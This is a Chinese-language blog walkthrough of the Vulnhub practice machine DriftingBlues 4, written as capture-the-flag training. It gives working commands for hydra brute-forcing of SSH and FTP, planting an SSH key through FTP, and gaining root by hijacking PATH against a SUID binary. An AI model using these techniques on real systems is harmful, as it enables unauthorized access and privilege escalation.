Vulnhub靶机:driftingblues 4

这篇具有很好参考价值的文章主要介绍了Vulnhub靶机:driftingblues 4。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:driftingblues4(10.0.2.20)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.20

Vulnhub靶机:driftingblues 4,靶场,web安全

使用nmap端口扫描发现靶机开放端口:21、22、80

Vulnhub靶机:driftingblues 4,靶场,web安全

打开网站没有可利用的功能点,并且使用dirsearch爆破目录也没爆破出来,查看源码,发现使用base64算法加密的隐藏数据

Vulnhub靶机:driftingblues 4,靶场,web安全

最终经过解码得到:/imfuckingmad.txt

访问该路径,得到一串使用Brainfuck加密的数据

Vulnhub靶机:driftingblues 4,靶场,web安全

解密得到:man we are a tech company and still getting hacked??? what the shit??? enough is enough!!! ###### /iTiS3Cr3TbiTCh.png

访问/iTiS3Cr3TbiTCh.png,发现图片是一个二维码,使用QR_Research工具识别得到一个网站,但无法访问,需要科学上网

Vulnhub靶机:driftingblues 4,靶场,web安全

Vulnhub靶机:driftingblues 4,靶场,web安全

得到一些用户名,将这些用户名构造字典,尝试使用hydra工具对ssh和ftp进行暴力破解

luther
gary
Hubert
clark

三、漏洞利用

#爆破ssh
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 10.0.2.20 ssh
#爆破ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 10.0.2.20 ftp -t 64 

爆破ssh失败提示不支持密码验证

Vulnhub靶机:driftingblues 4,靶场,web安全

爆破ftp成功得到用户名密码:luther/mypics

Vulnhub靶机:driftingblues 4,靶场,web安全

登录ftp,查看有什么可以利用的文件,发现sync_log文件和hubert文件夹

Vulnhub靶机:driftingblues 4,靶场,web安全

下载sync_log查看,是一个日志文件无法利用;而hubert文件夹是一个空文件夹

Vulnhub靶机:driftingblues 4,靶场,web安全

额,暂时没有思路了,瞄了一眼大佬的wp

hubert的uid与其他不一样是1001,这可能是一个用户文件夹,正好之前的用户字典里有一个Hubert,可以尝试上传ssh公钥获取shell

在本地创建ssh公钥和私钥对,将公钥文件另存为 authorized_keys

cat id_rsa.pub > authorized_keys

Vulnhub靶机:driftingblues 4,靶场,web安全

authorized_keys文件上传到/hubert/.ssh目录下,使用创建的私钥登录ssh

靶机执行
cd hubert
mkdir .ssh
cd .ssh
put authorized_keys

攻击机执行
chmod 600 id_rsa
ssh -i id_rsa hubert@10.0.2.20

Vulnhub靶机:driftingblues 4,靶场,web安全

四、提权

使用sudo -l命令查看有什么特权命令,发现没有

使用find / -perm -u=s -type f 2>/dev/null命令查看有什么可利用的具有root权限的文件,发现可疑文件/usr/bin/getinfo

Vulnhub靶机:driftingblues 4,靶场,web安全

执行该文件,发现该文件调用了命令ip,可以通过替换ip命令进行提权

Vulnhub靶机:driftingblues 4,靶场,web安全

替换ip命令,再执行/usr/bin/getinfo获取root权限

cd /tmp
echo '/bin/bash' > ip
chmod +x ip
export PATH=/tmp:$PATH

Vulnhub靶机:driftingblues 4,靶场,web安全

获取flag

Vulnhub靶机:driftingblues 4,靶场,web安全
Vulnhub靶机:driftingblues 4,靶场,web安全

参考链接:靶机渗透练习04-driftingblues4_driftingblues: 4-CSDN博客文章来源地址https://www.toymoban.com/news/detail-788883.html

到了这里,关于Vulnhub靶机:driftingblues 4的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(14)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(20)
  • vulnhub靶机AI-Web-1.0

    目录 靶机信息 主机信息 网站信息 SQL注入 权限提升 flag 靶机界面 确认攻击机和靶机在同一网段 查看下当前网段存活的主机 靶机的ip地址为10.4.7.145 扫下ip开放的端口 这边就开放了一个80 端口是一个Apache httpd 访问下网页 这个大概意思就是 连谷歌都搜不到我的信息 源码里也没

    2024年03月16日
    浏览(20)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(24)
  • web靶场——xss-labs靶机平台的搭建和代码审计

    目录 一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1:8088进入靶场 二、xss-labs靶场通关攻略 第一关: 1、输入代码进行测试:源代码 我们直接将参数插入标题试一试 第二关

    2024年02月04日
    浏览(26)
  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(20)
  • vulnhub靶机Misdirection

    下载链接:https://download.vulnhub.com/misdirection/Misdirection.zip 解压后双击ovf文件导入虚拟机 网络:DHCP、NAT、192.168.100.0/24网段 192.168.100.133是新增的ip 发现开放了以上端口,继续扫描端口详细信息 扫描的同时去访问一下80和8080端口看看 80是正常的网站 8080是apache默认页 进行目录扫描

    2024年02月02日
    浏览(28)
  • Vulnhub: blogger:1靶机

    kali:192.168.111.111 靶机:192.168.111.176 端口扫描 在80端口的 /assets/fonts/ 目录下发现blog目录,访问后发现为wordpress 利用wpscan发现wordpress插件 wpdiscuz 存在任意文件上传漏洞 msf进行漏洞利用 vagrant用户的密码同样为vagrant vagrant用户sudo权限 提升为root flag

    2024年02月14日
    浏览(19)
  • vulnhub momentum 靶机复盘

    到学校了 原来的桥接配置要改 这里记录几个点备忘 重新安装驱动VBoxNetLwf.inf 手动安装VBoxNetLwf.inf 不要用virtualbox自带的netlwfinstall rw init=/bin/bash 进去看看网卡配置 一个没什么功能点的web 在main.js下发现opus-details.php 可以传参id 然后会原封不动的展示 可以xss 没啥用 尝试对cook

    2024年02月06日
    浏览(22)
  • Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(30)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包